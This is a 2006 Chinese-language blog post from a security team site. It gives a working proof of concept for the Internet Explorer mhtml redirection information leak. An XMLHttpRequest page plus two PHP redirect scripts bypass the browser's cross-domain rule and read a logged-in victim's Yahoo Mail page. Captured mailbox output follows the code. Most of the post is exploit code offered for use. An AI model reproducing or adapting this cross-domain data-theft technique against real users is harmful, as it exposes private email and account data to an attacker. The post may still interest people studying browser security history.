IE mhtml redirection漏洞利用方法Author:yunshu_[At]_ph4nt0m.org
Team:http://www.ph4nt0m.org
Data: 2006-05-11
这个漏洞主要是信息泄露,参见http://secunia.com/advisories/19738/的具体描述。为了保证客户端安全,xmlhttp是无法跨域获取信息的。但是IE出现安全问题,在服务端通过mhtml重定向漏洞,可以利用xmlhttp 跨域获取敏感信息。我测试是我登陆了Yahoo Mail之后,通过漏洞可以成功获取到邮件资料。漏洞报告说影响IE6.0,我使用IE7同样遭到攻击。
下面是主页面,通过xmlhttp请求本域的页面。(这里改成直接访问其他域会出现拒绝访问错误)
<html>
<head>
<script language="JavaScript">
// Start XML HTTP Request Object
var request = InitXMLHttpRequest();
function StartTest()
{
document.getElementById("result").innerHTML = "init ok<br />";
document.getElementById("result").innerHTML += "begain open<br /> ";
// Open/
request.open('GET', 'http://www.icylife.net/valu1.php', true);
document.getElementById("result").innerHTML += "begain send<br /> ";
request.onreadystatechange = WhenDone;
// Make the request
request.send();
}
// Function for Initialising the XMLHttpRequest
function InitXMLHttpRequest()
{
var request;
try
{
request = new XMLHttpRequest();
}
catch (trymicrosoft)
{
try
{
request = new ActiveXObject("Msxml2.XMLHTTP");
}
catch (othermicrosoft)
{
try
{
request = new ActiveXObject("Microsoft.XMLHTTP");
}
catch (failed)
{
request = false;
}
}
}
// Initialised?
if ( !request )
{
alert("Due to limitations of your browser you will not be able to use this page.");
}
else
{
return request;
}
}
function WhenDone( )
{
if ( request.readyState == 4 )
{
document.getElementById("result").innerHTML = request.responseText;
}
}
</script>
</head>
<body>
<b>Start the test:</b><br>
<div id="start"><a href="javascript:StartTest();"><font color="#000000">Test Now</font></a></div>
<br />
<div id="result"></div>
</body>
</html>
这里是第二个页面,利用mhtml重定向,代码很简单。
<?php
header("Location: mhtml://http://icylife.net/valu2.php");
?>
再就是第三个,重定向到yahoo mail。
<?php
header("Location: http://mail.yahoo.com.cn/");
?>
我登陆了mail之后,攻击结果片段如下:
<html>
<head><META HTTP-EQUIV="content-type" CONTENT="text/html; charset=gb2312">
<title>
Yahoo!电邮 - wustyunshu@yahoo.com.cn</title>
<script type="text/javascript">
<!--
if(typeof top.frames["wmailmain"] != "undefined") window.open("http://mail.yahoo.com", "_top");
// -->
</script>
<noscript>
<META HTTP-EQUIV=Refresh CONTENT="0; URL=/ym/login?nojs=1">
</noscript>
推荐
评论(0条)
